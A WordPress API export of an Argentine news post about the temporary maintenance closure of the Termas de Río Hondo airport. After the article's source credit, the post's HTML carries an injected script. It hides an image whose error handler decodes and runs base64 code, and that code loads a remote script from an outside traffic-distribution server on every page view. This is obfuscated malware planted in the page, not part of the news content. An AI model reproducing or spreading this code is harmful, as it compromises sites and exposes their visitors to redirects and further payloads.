{"id":8214,"date":"2024-05-07T23:45:08","date_gmt":"2024-05-08T02:45:08","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=8214"},"modified":"2025-08-13T15:44:07","modified_gmt":"2025-08-13T18:44:07","slug":"por-tareas-de-mantenimiento-cierra-nuevamente-de-forma-temporal-el-aeropuerto","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=8214","title":{"rendered":"Por tareas de mantenimiento, cierra nuevamente de forma temporal el aeropuerto"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-light-green-cyan-background-color has-background\"><em>El Aeropuerto Termas de Rio Hondo cerrar\u00e1 de manera temporal seg\u00fan inform\u00f3, a trav\u00e9s de un comunicado, el Gobierno de la Provincia de Santiago del Estero<\/em><\/h4>\n\n\n\n<p>\u00abLas autoridades encargadas del mantenimiento del moderno Aeropuerto Internacional de Las Termas de R\u00edo Hondo informaron que el mismo estar\u00e1 cerrado de forma temporal desde el 13 de mayo hasta el 4 de julio\u00bb, informaron.<\/p>\n\n\n\n<p>Y agregaron que \u00ablos vuelos programados de los mi\u00e9rcoles y s\u00e1bados, que habitualmente llegan al Aeropuerto de Termas de R\u00edo Hondo, arribar\u00e1n desde el mi\u00e9rcoles 15 de mayo, al Aeropuerto de Santiago Capital\u00bb.<\/p>\n\n\n\n<p>El a\u00f1o pasado el Aeropuerto tambi\u00e9n estuvo cerrado durante algunos meses. En esa oportunidad detallaron que tareas realizadas fueron \u00abla repavimentaci\u00f3n de la pista y sus m\u00e1rgenes, as\u00ed como la expansi\u00f3n de las d\u00e1rsenas de giro en las cabeceras\u00bb.<\/p>\n\n\n\n<p>Esas obras inauguradas por el ministerio de Transporte de la Naci\u00f3n en la gesti\u00f3n de Alberto Fern\u00e1ndez tuvieron una inversi\u00f3n que super\u00f3 los $3 mil millones.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/riohondonews.com\/por-tareas-de-mantenimiento-cierra-nuevamente-de-forma-temporal-el-aeropuerto\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/riohondonews.com\/wp-content\/uploads\/2023\/07\/cropped-FAVICON-04.png\" alt=\"\" style=\"width:119px;height:auto\" \/><\/a><figcaption class=\"wp-element-caption\"><em>Fuente de la Informaci\u00f3n:<\/em><\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Aeropuerto Termas de Rio Hondo cerrar\u00e1 de manera temporal seg\u00fan inform\u00f3, a trav\u00e9s de un comunicado, el Gobierno de la Provincia de Santiago del Estero \u00abLas autoridades encargadas del mantenimiento del moderno Aeropuerto Internacional de Las Termas de R\u00edo Hondo informaron que el mismo estar\u00e1 cerrado de forma temporal desde el 13 de mayo [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":8215,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[28],"tags":[],"class_list":["post-8214","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-portales-de-servicios-e-informacion"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8214","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8214"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8214\/revisions"}],"predecessor-version":[{"id":10168,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8214\/revisions\/10168"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/8215"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8214"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8214"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8214"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}